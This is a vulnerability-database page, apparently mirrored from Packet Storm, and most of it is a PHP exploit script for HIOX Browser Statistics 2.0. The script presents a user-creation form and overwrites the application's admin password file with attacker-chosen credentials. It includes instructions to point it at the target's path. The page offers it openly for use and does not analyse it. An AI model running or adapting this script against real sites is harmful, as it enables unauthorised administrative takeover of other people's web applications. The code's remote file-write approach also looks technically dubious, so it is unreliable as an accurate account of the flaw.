Lucene search
K
Database
Vendors
Products
Years
CVSS
Scanner
Agent Scanning
API Scanning
Manual Audit
Perimeter Scanner
Scanning
Projects
Email
Webhook
Plugins
Resources
Documents
Blog
Glossary
FAQ
Pricing
Contacts
About Us
Partners
Branding Guideline

hiox-browseradd.txt

🗓️ 31 Jul 2008 00:00:00Reported by StackType 
packetstorm
 packetstorm🔗 packetstormsecurity.com👁 21 Views

HIOX Browser Statistics 2.0 Arbitrary Add Admin User Vulnerabilit

Show more

5 of 5AI Insights are available for you today

Leverage the power of AI to quickly understand vulnerabilities, impacts, and exploitability

Code
`<?php  
@session_start();  
?>  
<table align=center width=72% height=95% ><tr><td>  
<?php  
/*  
HIOX Browser Statistics 2.0 Arbitrary Add Admin User Vulnerability   
[~] Discoverd & exploited by Stack  
[~]Greeatz All Freaind  
[~]Special thnx to Str0ke  
[~] Name Script : HIOX Browser Statistics 2.0  
[~] Download : http://www.hscripts.com/scripts/php/downloads/HBS_2_0.zip  
You need to change http://localhost/path/ with the link of script it's very importent  
*/  
$creat = "true";  
$iswrite = $_POST['createe'];  
if($user=="" && $pass==""){  
if($iswrite == "creatuser")  
{  
$usname = $_POST['usernam'];  
$passwrd = md5($_POST['pword']);  
if($usname != "" && $passwrd != ""){  
$filee = "http://localhost/path/admin/passwo.php";  
$file1 = file($filee);  
$file = fopen($filee,'w');  
fwrite($file, "<?php \n");  
fwrite($file, "$");  
fwrite($file, "user=\"$usname\";\n");  
fwrite($file, "$");  
fwrite($file, "pass=\"$passwrd\";");  
fwrite($file, "\n?>");  
fclose($file);  
$creat = "false";   
echo "<div align=center style='color: green;'><b>New User Created  
<meta http-equiv=\"refresh\" content=\"2; url=http://localhost/path/admin/index.php\">  
<br>Please Wait You will be Redirected to Login Page  
</div>";  
}  
else{  
echo "<div align=center style='color: red;'><b>Enter correct Username or Password </div>";  
}  
}  
if($creat == "true"){  
?>  
<table align=center valign=center bgcolor=000000 align=center cellpadding=0 style="border: 1px #000000 solid;">  
<tr width=400 height=20><td align=center bgcolor="000000"  
style="color: ffffff; font-family: arial,verdana,san-serif; font-size:13px;">  
Create New User </td></tr>  
<tr width=400 height=20><td>  
<form name=setf method=POST action=<?php echo $PHP_SELF;?>>  
<table style="color:#ffffff; font-family: arial,verdana,san-serif; font-size:13px;">  
<tr><td>User Name</td><td><input class="ta" name="usernam" type=text maxlength=20 >  
</td></tr>  
<tr><td>Password</td><td><input class="ta" name="pword" maxlength=20 type=password></td></tr>  
<input name="createe" type=hidden value="creatuser"></td></tr>  
<tr><td></td><td><input type=submit value="create"></td></tr>  
</table>  
</form>  
</td></tr></table>  
<?php  
}  
}else{  
echo "<div align=center style='color: red;'><b>User Already Exist</div>";  
}  
?>  
</td></tr></table>  
  
`

Transform Your Security Services

Elevate your offerings with Vulners' advanced Vulnerability Intelligence. Contact us for a demo and discover the difference comprehensive, actionable intelligence can make in your security strategy.

Book a live demo
31 Jul 2008 00:00Current
7.4High risk
Vulners AI Score7.4
phpsession startexploituser creationfile writinginput validation
21
.json
Report